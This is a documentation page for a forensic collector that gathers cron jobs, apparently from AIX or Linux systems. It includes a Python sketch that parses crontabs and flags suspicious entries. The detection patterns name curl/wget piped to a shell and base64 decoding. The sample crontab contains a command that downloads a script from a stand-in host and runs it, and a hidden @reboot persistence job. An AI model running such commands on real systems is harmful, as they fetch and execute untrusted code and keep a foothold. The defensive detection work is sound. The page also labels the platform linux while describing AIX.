Cron Jobs
Overview
Evidence: Cron Jobs
Description: Collect cron jobs
Category: System
Platform: linux
Short Name: cronj
Is Parsed: Yes
Sent to Investigation Hub: Yes
Collect File(s): No
Background
Cron jobs on AIX systems are scheduled tasks that run automatically at specified times or intervals. This data is essential for understanding system automation, detecting unauthorized scheduled tasks, and investigating time-based security incidents. Cron jobs provide evidence of automated processes, maintenance tasks, and potential persistence mechanisms used by attackers.
Data Collected
This collector gathers structured data about cron jobs.
Cron Jobs Data

| Field | Description | Example |
| --- | --- | --- |
| Minute | Minute | Example value |
| Hour | Hour | Example value |
| DayOfMonth | Day Of Month | Example value |
| Month | Month | Example value |
| DayOfWeek | Day Of Week | Example value |
| Command | Command | Example value |
| Path | Path | Example value |
| Event | Event | Example value |
Collection Method
This collector parses the necessary data from cron configuration files.
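The sketch below shows one way crontab text can be parsed into the fields listed under Data Collected and then triaged. It is an added example, not the collector's own code. It assumes that `@reboot`-style shortcuts are what the Event field records; the triage patterns and the sample crontab are constructed for illustration.

```python
import re

SCHEDULE = ("Minute", "Hour", "DayOfMonth", "Month", "DayOfWeek")
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")
# Illustrative triage patterns (assumptions, not the collector's rules).
SUSPICIOUS = re.compile(r"(/tmp/|/dev/shm/|base64\s+-d|\b(curl|wget)\b.*\|\s*(ba)?sh)")

def parse_crontab(text, path, has_user_column=False):
    """Return one dict per job, keyed by the field names under Data Collected."""
    # has_user_column: True for /etc/crontab-style files with a user field.
    skip = 1 if has_user_column else 0
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        # Ignore blanks, comments and environment assignments (e.g. MAILTO=root).
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        rec = dict.fromkeys(SCHEDULE + ("Command", "Event"), "")
        rec["Path"] = path
        # Assumption: @reboot-style shortcuts populate Event instead of the schedule.
        n_sched = 1 if line.startswith("@") else 5
        parts = line.split(None, n_sched + skip)
        if len(parts) < n_sched + skip + 1:
            continue  # malformed line: schedule without a command
        if n_sched == 1:
            rec["Event"] = parts[0]
        else:
            rec.update(zip(SCHEDULE, parts))  # zip stops after the five schedule fields
        rec["Command"] = parts[-1]
        records.append(rec)
    return records

def flag_suspicious(records):
    """Return records whose Command matches a triage pattern."""
    return [r for r in records if SUSPICIOUS.search(r["Command"])]

# Constructed sample input, not taken from a real system.
SAMPLE = """\
# m h dom mon dow user command
MAILTO=root
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root curl -s http://example.invalid/u.sh | sh
@reboot root /dev/shm/.x
30 2 * *
"""

if __name__ == "__main__":
    for job in flag_suspicious(parse_crontab(SAMPLE, "/etc/crontab", True)):
        print(job["Path"], job["Event"] or job["Minute"], job["Command"])
```

Per-user crontabs have no user column, so call `parse_crontab` with the default `has_user_column=False` for those files.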
Forensic Value
This evidence is crucial for forensic investigations as it provides information about scheduled tasks and automated processes on AIX systems. It helps investigators understand system automation, detect unauthorized scheduled tasks, and investigate time-based attacks. The data can reveal maintenance schedules, automated processes, and potential persistence mechanisms. Analysts can use this information to identify suspicious scheduled tasks, trace automated activities, and assess AIX system security posture.